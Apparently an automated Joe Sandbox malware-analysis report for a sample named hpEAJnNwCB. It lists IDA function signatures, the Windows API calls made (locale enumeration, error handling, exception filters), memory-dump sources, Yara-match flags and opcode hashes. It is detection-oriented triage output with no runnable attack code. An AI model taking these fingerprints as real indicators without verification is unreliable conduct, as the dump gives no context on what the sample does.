• Instruction ID: 80cf140e91eb6a6325efdfb889abfd38af81fc0c9933d2cf9e9882f1444081a0
• Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
• Instruction Fuzzy Hash: CD21B03A95420AABDF689E2DDC42BBA77ACEB04318F20017FED01D6250EB759944CB50

APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: ErrorLast$_free$InfoLocale
• String ID:
• API String ID: 2955987475-0
• Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
• Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
• Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
• Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99

APIs
  • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
  • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
  • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
• EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,024C0A1C,?,024CBC89,00000000,?,?,?), ref: 024CB5A6
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_free
• String ID:
• API String ID: 2016158738-0
• Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
• Instruction ID: 90f12ea98e8d04160b3d421ad7a2fa3c11264305ff5f77461d81fa701db64628
• Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
• Instruction Fuzzy Hash: 1D11C63A2007055FDB189F3DC89267ABB92FF8475CB25442DD94687740D771A542CB40

APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
• EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_free
• String ID:
• API String ID: 2016158738-0
• Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
• Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
• Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
• Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784

APIs
  • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
  • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
  • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,024CB87A,00000000,00000000,?), ref: 024CBB08
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: ErrorLast$InfoLocale_free
• String ID:
• API String ID: 787680540-0
• Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
• Instruction ID: 1115fa2ab215e34a2e4971d1695d130c9bdf8dd89431bb16d99b8b0971c6c7d2
• Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4F0F93AA001166BDB689A29CC46BBB7768EF4071CF24046EDD05A3644FB70BE42CAD0
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 787680540-0
                                                                                                                                                                                                                                            • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                            • Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: _free.LIBCMT ref: 024C21A0
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21AD
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 024CB900
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2955987475-0
                                                                                                                                                                                                                                            • Opcode ID: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                                                                                                                                                                                            • Instruction ID: ffef62fb7703a98d6accad780bcbb6860a26bbd15c394bcd3c75001c5ce1da19
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d32582cdea7e1768c45f561c62b89e044e33708acaf6235ec9442aa70aeaeee6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D014936B511049BCB18EF38DD41ABA33A9DF04315F1441BFEE02DB281DAB55D048B50
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
                                                                                                                                                                                                                                              • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,024C0A1C,?,024CBC4D,024C0A1C,?,?,?,?,?,024C0A1C,?,?), ref: 024CB61B
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2016158738-0
                                                                                                                                                                                                                                            • Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                                                                                                                                                            • Instruction ID: 36ea6ead7d9f71a99500d584cce1c5411a3792ed85fcf48559a88f30f12426a4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47F0C23A300B055FDB246F3DDC82B7A7B95EF8076CF25442EFA458B650D7B198028A44
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                              • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2016158738-0
                                                                                                                                                                                                                                            • Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                                                                                                                                                            • Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,024C047A,?,00000004), ref: 024C547A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2299586839-0
                                                                                                                                                                                                                                            • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                            • Instruction ID: dca8ab5af1adc2672d4bbfe0e8776cca0df0ae969c2942eae3b04f6a0a4553e0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4BF0F635680318BBDB016F55CC01F6E7B26EF04B12F50411EFC05B6290DA719920AA99
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 024BE654: RtlEnterCriticalSection.NTDLL(02040DAF), ref: 024BE663
                                                                                                                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 024C506C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1272433827-0
APIs
  • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
• EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
APIs
  • Part of subcall function 024C2141: GetLastError.KERNEL32(?,?,024BA9EC,?,00000000,?,024BCDE6,0249247E,00000000,?,00451F20), ref: 024C2145
  • Part of subcall function 024C2141: _free.LIBCMT ref: 024C2178
  • Part of subcall function 024C2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
• EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,024CBCAB,024C0A1C,?,?,?,?,?,024C0A1C,?,?,?), ref: 024CB520
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_free
• String ID:
• API String ID: 2016158738-0
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
• EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_free
• String ID:
• API String ID: 2016158738-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(00410672,0249FE60), ref: 024A08D2
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                                                                                                                                                                                            • Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                                                                                                                                                            • Instruction ID: 0d9c5e97eb769fe52307554ece7da4665c320b79a11dbfb4ca4a059b38443d36
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96D1B6331085A24ADB6F4A3A84700BBFFF26E821A530D479FD4F7CA6C2EA24D555D670
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                            • Instruction ID: 4834b7865edd1a94633a77e7b6be4d9b6cbc1de95510be84c880d8db3e80f095
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B69122721090A34AEB6F463E85741BFFFE55E812A530A079FD4F2CA2C5EF248555DA30
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                            • Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                            • Instruction ID: 6b294422089193adff9595540bd462b67c54910d460a54a17f1fff1e00cfa154
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 799140721090A34AEB6B467E85741BFFFE55E821A630A079FD4F2CA2C5FE24C165D630
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                            • Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                            • Instruction ID: 9798d8fffb95db3bf105ee70dbcca8f3b25c487433f8b1ebdb393c604614fcd0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 089132731090A20ADB6B463D85781BEFFE19EC11A570A079FE4F2CE2C5EE14D665D630
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                            • Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                            • Instruction ID: 688709eccc1ef3f81edecbb1763f3103fff13e7f483b4a73f817d2801b0b7a58
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1615631E00B05D6DE3B6A288890BFF63959F45A09F0408EFE886DB7C0D7159983C7B5
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
